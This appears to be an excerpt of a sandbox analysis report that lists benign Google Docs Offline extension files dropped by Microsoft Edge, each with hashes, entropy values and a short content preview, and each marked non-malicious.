                                                                                                                                                                                                                                                                                                                    Size (bytes):1063
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                                    MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                                    SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                                    SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                                    SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1333
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                                    MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                                    SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                                    SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                                    SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1263
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                                    MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                                    SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                                    SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                                    SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1074
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                                    MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                                    SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                                    SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                                    SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):879
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                                    MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                                    SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                                    SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                                    SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1205
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                                    MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                                    SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                                    SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                                    SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):843
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                                    MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                                    SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                                    SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                                    SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):912
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                                    MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                                    SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                                    SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                                    SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):11280
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.751992630887702
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
                                                                                                                                                                                                                                                                                                                    MD5:250C48F4915DD4C0DFA7E7E021A4F066
                                                                                                                                                                                                                                                                                                                    SHA1:092A98BF40D8C18280393BF3811A7DFA9A9FD326
                                                                                                                                                                                                                                                                                                                    SHA-256:26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
                                                                                                                                                                                                                                                                                                                    SHA-512:8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):854
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                                    MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                                    SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                                    SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                                    SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2525
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.417833205646285
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
                                                                                                                                                                                                                                                                                                                    MD5:236D2DD305D64C2B6ABD232ED53270DF
                                                                                                                                                                                                                                                                                                                    SHA1:9F6885E95FBC4213631F0B0EA49C803D07D34136
                                                                                                                                                                                                                                                                                                                    SHA-256:2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
                                                                                                                                                                                                                                                                                                                    SHA-512:B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):97
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                                    MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                                    SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                                    SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                                    SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3777)
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):98880
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.414989230634404
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
                                                                                                                                                                                                                                                                                                                    MD5:DC93A1045D1AD8D7ADD06B93B2FE79E2
                                                                                                                                                                                                                                                                                                                    SHA1:CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
                                                                                                                                                                                                                                                                                                                    SHA-256:D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
                                                                                                                                                                                                                                                                                                                    SHA-512:025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):291
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                                    MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                                    SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                                    SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                                    SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3782)
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):107677
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.396220758526552
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
                                                                                                                                                                                                                                                                                                                    MD5:E8015AC436B33034EDF7DA060E853A04
                                                                                                                                                                                                                                                                                                                    SHA1:62D0F6EB0E441158A1F56F6E0C70D3D229B57886
                                                                                                                                                                                                                                                                                                                    SHA-256:23C953E989FF4AF6126D4A3B2AD21B33A82512FC8768045C00F05940DE2C9978
                                                                                                                                                                                                                                                                                                                    SHA-512:C35AC8692FC22B78365CA202E173A90AE4B5DBA338B7FC9EEB17EDDF5868B52CF1D13DC0EDAF36BE1CC0E0152F41AC4027C51D7ECA27778B483E3FC83F11EA82
                                                                                                                                                                                                                                                                                                                    Malicious:false
